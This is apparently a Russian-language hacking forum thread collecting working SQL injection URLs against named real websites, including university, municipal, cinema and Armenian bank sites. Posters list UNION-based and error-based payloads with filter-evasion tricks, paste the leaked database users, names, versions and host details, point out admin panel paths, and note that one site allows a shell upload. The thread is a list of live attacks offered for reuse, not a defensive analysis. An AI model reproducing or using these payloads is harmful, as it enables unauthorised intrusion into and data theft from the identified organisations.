SQL Инъекции

чёт много админок ни 1 шела...пздц как так

 

Единственное, что было интересно, это доменная зона.
.GR
http://www.gagarin205.gr/date.php?date=501+and+1=2+union+select+1,user(),version(),4,5+--+

 

http://www.aiesep.ulg.ac.be/pages/poster_prize.php?id_event=32+uniOn/*pp*/select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version()),13,14,15--

http://www.crifa.ulg.ac.be/archives/edutech/actres/view_record.php?tb=sp&id=12+and/*ppp*/1=2+union/*ppp*/select+1318982400

 

Стремлюсь стать админом на всех Россиских сайтах, ну или хотябы на половине

 

http://www.reeltoo.ru/re/live/?show=-22861+union+all+select+1,2,3,4,5,6,7,8,group_concat%28login,0x3a,pass%29,10,database%28%29,user%28%29,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37%20from%20sys_users--

no login,no pass

 

Leform.ru CY275 PR4

Code:

http://www.leform.ru/news.php?date=2011-4'+union+select+1,2,concat('User:',user(),'%3Cbr%20/%3EVersion:',version(),'%3Cbr%20/%3EDatabase:',database()),4,NULL,6,7,8,9+/*+

 

PR-5 ТИЦ-350

Code:

http://www.pilot-film.com/index.php?id=999999.9+union+all+select+0x6E6F,version(),0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F,0x6E6F--

http://www.pilot-film.com/update/index.php - админка
http://www.pilot-film.com/myadmin - админка

 

Армянский БАНК
тиЦ 90 PR 5

Code:

http://www.acba.am/index.php?page=-1%27+union+select+1,2,3,4,5,6,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,8,9,10+--+

tigran@localhost:acbadb:5.0.92-log

 

Мега крутой сайт

 

http://wipz.uwp.edu/news.php?id=-1%20union%20select%201,table_name,3,4,5,6,7+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61

 

Московский кинотеатр.

http://www.5zvezd.ru/news/2011/10/20/930+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,14,15,16,17,18,19,20,21,22,23,24,25+--+/

 

Target: http://www.hbswany.org/images.html?view_album=20
Host IP: 207.171.1.101
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 769 ms
Current User: webuser1@localhost
Sql Version: 5.0.82sp1
Current DB: hbswany_org
System User: webuser1@localhost
Host Name: jaws02.omnimagnet.com
Installation dir: /usr/
DB User: 'webuser1'@'%'

 

Code:

http://secure.ws-montessori.com/produkt/produkt.php?show=-6/**/union/**/select/**/1,2,3,version(),5,6,7,8,9,10--

У кого есть словарь немецких таблиц может попробовать просканить А так.. mysql 4

DB: montessorien

 

Code:

http://www.sleepmonsters.us/news.php?article_id=-4315+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7,8,9,10,11,12,13--+

5.0.77-log:503342_SleepMonsters:[email protected]

 

Code:

http://www.iceandwine.com/product-list.php?cid=-13+union+select+version%28%29--

 

Code:

http://www.morehate.com/ru/press.php?id=49+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29--

morehat1_karalez@localhost:morehat1_morehateru:5.0.92-log

Code:

http://www.morehate.com/ru/press.php?id=49+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES--

 

Code:

http://kuzshop.ru/?p=28&c=-72+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5--+

5.1.58-log:wwwkuzshopru_evrik:[email protected]

Code:

http://www.towncrier.us/crierdetail.php?smenu=1&twindow=&sdetail=17860&mad=&wpage=1&skeyword=&sidate=&recID=-1237+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,6,7--+

4.0.18-standard:town_crier:milford_crier@localhost

Code:

http://www.sunnet.us/view_news.php?nid=70+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5--+

5.0.45-community-nt:sn_db:sn_usr@localhost

Code:

http://www.ci.mesquite.tx.us/pressrelease/Press_release.php?IDkey=-187+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--+

4.0.24-nt:news:[email protected]

Code:

http://womenofthestorm.us/news_subdet.php?wots_subcontent_ID=-133+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--+

5.1.52-log:wos:wos_user@localhost

 

зачем еду удалили?

http://www.lakeerie.edu/news.php?id=0%20union%20select%201,2,version(),4,5,6,7,8

http://www.spcc.edu/news.php?id=0%20union%20select%201,2,version(),4,5,6,7,8,9,10

http://archive.parsons.edu/view.php?pid=68%20and%20database()='dt_archive'

http://www.mcs.sdsmt.edu/view.php?p=0%20union%20select%201,version(),3,4,5,6
(в последнюю можно без проблем залить шелл )

 

тиЦ 400 PR 3

Code:

http://www.pascal.ru/index.php?id=9999999+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+--+

pascal.ru@localhost: pascal:5.0.24a-log

Code:

http://www.pascal.ru/index.php?id=9999999+union+select+table_name+from+information_schema.tables--

 

Maly.ru Тиц1000 PR6

Code:

http://maly.ru/people.php?name=ZharovM%27+order+by+10++--+

ололо, "hack attempt detected", автор видимо не вкурсе о group by.

Code:

http://maly.ru/people.php?name=ZharovM%27+group+by+11++--+

Впрочем стоит фильтр на UniOn SelEct, не стал париться, ошибка выводится, и этого достаточно.

Code:

http://maly.ru/people.php?name=1%27+and%28select+1+from%28select+count%28*%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+--+